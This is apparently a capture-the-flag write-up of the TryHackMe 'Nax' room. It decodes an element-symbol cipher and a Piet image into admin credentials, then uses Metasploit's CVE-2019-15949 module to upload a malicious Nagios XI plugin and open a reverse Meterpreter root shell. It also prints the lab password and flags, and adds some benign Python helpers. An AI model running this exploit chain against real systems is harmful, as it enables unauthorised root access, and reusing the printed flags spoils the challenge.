THM - Nax Writeup

luc1f3r
3 min read · Mar 24, 2022

This is my first write-up; I hope you enjoy it. If you run into any difficulty, try to work it out yourself; you are a hacker, after all.

A Google search for "most powerful and trusted network monitoring software on the market" turns up Nagios XI, a name that matches the room title, so that is the working assumption going into enumeration.

Now let’s begin with the enumeration:

┌──(root💀Luc1f3r)-[~/THM/Nax]
└─# rustscan -a 10.10.108.22 --ulimit 5000
(RustScan ASCII banner)
The Modern Day Port Scanner.
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.108.22:22
Open 10.10.108.22:25
Open 10.10.108.22:80
Open 10.10.108.22:389
Open 10.10.108.22:443
Open 10.10.108.22:5667

All open ports found. Besides the usual SSH, SMTP, HTTP, LDAP and HTTPS, port 5667 is the default port of NSCA (the Nagios Service Check Acceptor), which already backs the Nagios guess. Start with the softest target, the HTTP service on port 80, where the index page shows a cryptic message:
Welcome to elements.
Ag — Hg — Ta — Sb — Po — Pd — Hg — Pt — Lr

Each symbol is a chemical element. Replace every symbol with its atomic number and read the numbers as ASCII codes:
47 80 73 51 84 46 80 78 103 > /PI3T.PNg
Hidden file: PI3T.PNg
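A small decoder for this element cipher, added here as an example (it is not code from the original write-up). It embeds the 118 element symbols in atomic-number order, accepts symbols separated by spaces, hyphens or dashes, and also encodes text back in the same scheme, which exposes a limit the page does not mention: only characters with ASCII codes up to 118 (space through "v") can be represented, so "w", "x", "y", "z", "{", "|", "}" and "~" have no element. The function names decode, encode and atomic_numbers are my own.

```python
import re

# Symbols of elements 1..118 in atomic-number order (standard periodic table),
# ten per row; index + 1 is the atomic number.
_ELEMENTS = (
    "H He Li Be B C N O F Ne "
    "Na Mg Al Si P S Cl Ar K Ca "
    "Sc Ti V Cr Mn Fe Co Ni Cu Zn "
    "Ga Ge As Se Br Kr Rb Sr Y Zr "
    "Nb Mo Tc Ru Rh Pd Ag Cd In Sn "
    "Sb Te I Xe Cs Ba La Ce Pr Nd "
    "Pm Sm Eu Gd Tb Dy Ho Er Tm Yb "
    "Lu Hf Ta W Re Os Ir Pt Au Hg "
    "Tl Pb Bi Po At Rn Fr Ra Ac Th "
    "Pa U Np Pu Am Cm Bk Cf Es Fm "
    "Md No Lr Rf Db Sg Bh Hs Mt Ds "
    "Rg Cn Nh Fl Mc Lv Ts Og"
).split()
assert len(_ELEMENTS) == 118

ATOMIC_NUMBER = {sym: i + 1 for i, sym in enumerate(_ELEMENTS)}
SYMBOL = {i + 1: sym for i, sym in enumerate(_ELEMENTS)}

# Token separators: whitespace, hyphen, en dash, em dash (the page uses em dashes).
_SEP = re.compile(r"[\s\-\u2013\u2014]+")


def atomic_numbers(message: str) -> list:
    """Turn 'Ag — Hg — Ta' into [47, 80, 73]; unknown symbols are an error."""
    numbers = []
    for token in _SEP.split(message.strip()):
        if not token:
            continue
        if token not in ATOMIC_NUMBER:
            raise ValueError(f"not an element symbol: {token!r}")
        numbers.append(ATOMIC_NUMBER[token])
    return numbers


def decode(message: str) -> str:
    """Read each atomic number as an ASCII code."""
    return "".join(chr(n) for n in atomic_numbers(message))


def encode(text: str, sep: str = "-") -> str:
    """Inverse direction; fails for characters above ASCII 118 ('v')."""
    symbols = []
    for ch in text:
        code = ord(ch)
        if code not in SYMBOL:
            raise ValueError(f"{ch!r} (ASCII {code}) has no element with that atomic number")
        symbols.append(SYMBOL[code])
    return sep.join(symbols)


if __name__ == "__main__":
    # Constructed input: the message from the room's index page.
    message = "Ag — Hg — Ta — Sb — Po — Pd — Hg — Pt — Lr"
    print(atomic_numbers(message))
    print(decode(message))
    print(encode(decode(message)))
```

Running it prints the atomic numbers, then /PI3T.PNg, then the message re-encoded with hyphens; the round trip is a cheap sanity check that the element table is indexed correctly.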

┌──(root💀Luc1f3r)-[~/THM/Nax]
└─# wget http://10.10.108.22/PI3T.PNg
The image is not ordinary steganography: it is a Piet program (Piet is an esoteric language whose source code is a bitmap), so it has to be run through a Piet interpreter; the stego cheat sheet at https://0xrick.github.io/lists/stego/ points to one. Running the image prints the credentials: nagiosadmin:n3p3UQ&9BjLp4$7uhWdY
Username: nagiosadmin
Password: n3p3UQ&9BjLp4$7uhWdY
Note that the password contains & and $, so wrap it in single quotes whenever it is passed on a shell command line.

Directory brute force with feroxbuster (one of my favourite tools):
┌──(root💀Luc1f3r)-[~/THM/Nax]
└─# feroxbuster --url http://10.10.108.22/
http://10.10.108.22/
http://10.10.108.22/javascript
http://10.10.108.22/javascript/jquery
http://10.10.108.22/javascript/jquery/
http://10.10.108.22/javascript/jquery/jquery
http://10.10.108.22/server-status
http://10.10.108.22/nagios (interesting)
The /nagios path confirms Nagios is running. A further search shows that the web interface of Nagios XI, the product guessed from the room name, lives at /nagiosxi by default, so request that path directly rather than relying on the wordlist to find it.

Logging in through the browser with those credentials gives access to the Nagios XI control panel. Searching for known exploits against this version:
> https://www.exploit-db.com/exploits/48191
> https://nvd.nist.gov/vuln/detail/CVE-2019-15949
> https://github.com/jakgibb/nagiosxi-root-rce-exploit
Vulnerability: CVE-2019-15949, authenticated remote code execution in Nagios XI before 5.6.6. An authenticated admin can upload a malicious monitoring plugin through the web interface, and the plugin is executed as root, so a working exploit yields a root shell straight away.
Confirmed the exploit using Metasploit:
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run

[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable to the following 5 exploit(s):
[*] CVE-2018-15708, CVE-2018-15710 exploit/linux/http/nagios_xi_magpie_debug
[*] CVE-2019-15949 exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
[*] CVE-2020-35578 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*] CVE-2020-5792 exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] CVE-2021-37343 exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
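Reading the scanner output by hand is fine for one host. The following is an added example (not part of the write-up and not Metasploit code) that parses the version and the CVE list out of that output and checks the version against the fixed-in release for CVE-2019-15949, which is 5.6.6 according to its NVD entry, using numeric rather than string comparison. The sample output is a constructed copy of the lines above; the function names are my own. Note that the scanner reports five exploit modules but six CVE IDs, because the magpie_debug module covers two.

```python
import re

# Constructed copy of the auxiliary/scanner/http/nagios_xi_scanner output shown
# above; the parser only relies on the "with version X.Y.Z" and "CVE-..." text.
SAMPLE_SCANNER_OUTPUT = """\
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable to the following 5 exploit(s):
[*] CVE-2018-15708, CVE-2018-15710 exploit/linux/http/nagios_xi_magpie_debug
[*] CVE-2019-15949 exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
[*] CVE-2020-35578 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*] CVE-2020-5792 exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
[*] CVE-2021-37343 exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Scanned 1 of 1 hosts (100% complete)
"""

# First Nagios XI release not affected by CVE-2019-15949
# (NVD: "Nagios XI before 5.6.6 allows remote command execution as root").
CVE_2019_15949_FIXED_IN = "5.6.6"

_VERSION_RE = re.compile(r"Nagios XI with version (\d+(?:\.\d+)+)")
_CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def version_tuple(version: str) -> tuple:
    """'5.5.6' -> (5, 5, 6); tuples compare numerically, strings do not."""
    return tuple(int(part) for part in version.split("."))


def parse_scanner_output(text: str):
    """Return (version or None, ordered de-duplicated list of CVE IDs)."""
    match = _VERSION_RE.search(text)
    version = match.group(1) if match else None
    cves = list(dict.fromkeys(_CVE_RE.findall(text)))
    return version, cves


def vulnerable_to_cve_2019_15949(version: str) -> bool:
    """Numeric comparison against the fixed-in version."""
    return version_tuple(version) < version_tuple(CVE_2019_15949_FIXED_IN)


def naive_string_check(version: str) -> bool:
    """The tempting but wrong way: lexicographic comparison of version strings.
    It calls 5.10.0 older than 5.6.6 because '1' sorts before '6'."""
    return version < CVE_2019_15949_FIXED_IN


if __name__ == "__main__":
    version, cves = parse_scanner_output(SAMPLE_SCANNER_OUTPUT)
    print(f"version {version}, {len(cves)} CVE IDs: {', '.join(cves)}")
    print("CVE-2019-15949 applies:", vulnerable_to_cve_2019_15949(version))
    for v in ("5.5.6", "5.6.6", "5.10.0"):
        print(f"{v}: numeric={vulnerable_to_cve_2019_15949(v)} "
              f"string={naive_string_check(v)}")
```

The 5.10.0 case is the one to remember: a string comparison would report a patched build as vulnerable (and, for other CVEs, the reverse), which is exactly the kind of false result that sends you down a dead exploit path.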

Let’s Hack…
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run

[*] Started reverse TCP handler on 10.8.93.34:9001
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.6
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3020772 bytes) to 10.10.108.22
[*] Meterpreter session 1 opened (10.8.93.34:9001 -> 10.10.108.22:59298) at 2022-03-24 16:10:46 +0530
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter > shell
Process 31417 created.
Channel 1 created.
whoami
root
which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile#

The shell is already root, so no privilege escalation is needed. Collect the flags (root.txt in /root, user.txt in /home/galand) and we are done for the day:
root@ubuntu:~# cat root.txt
THM{c89b2e39c83067503a6508b21ed6e962}
root@ubuntu:/home/galand# cat user.txt
THM{84b17add1d72a9f2e99c33bc568ae0f1}

Thank you for going through the article. Keep Hacking.


Cyber Security Enthusiast, Freelancer, Researcher, Bug Bounty Hunter, and InfoSec Writer. | eJPT certified.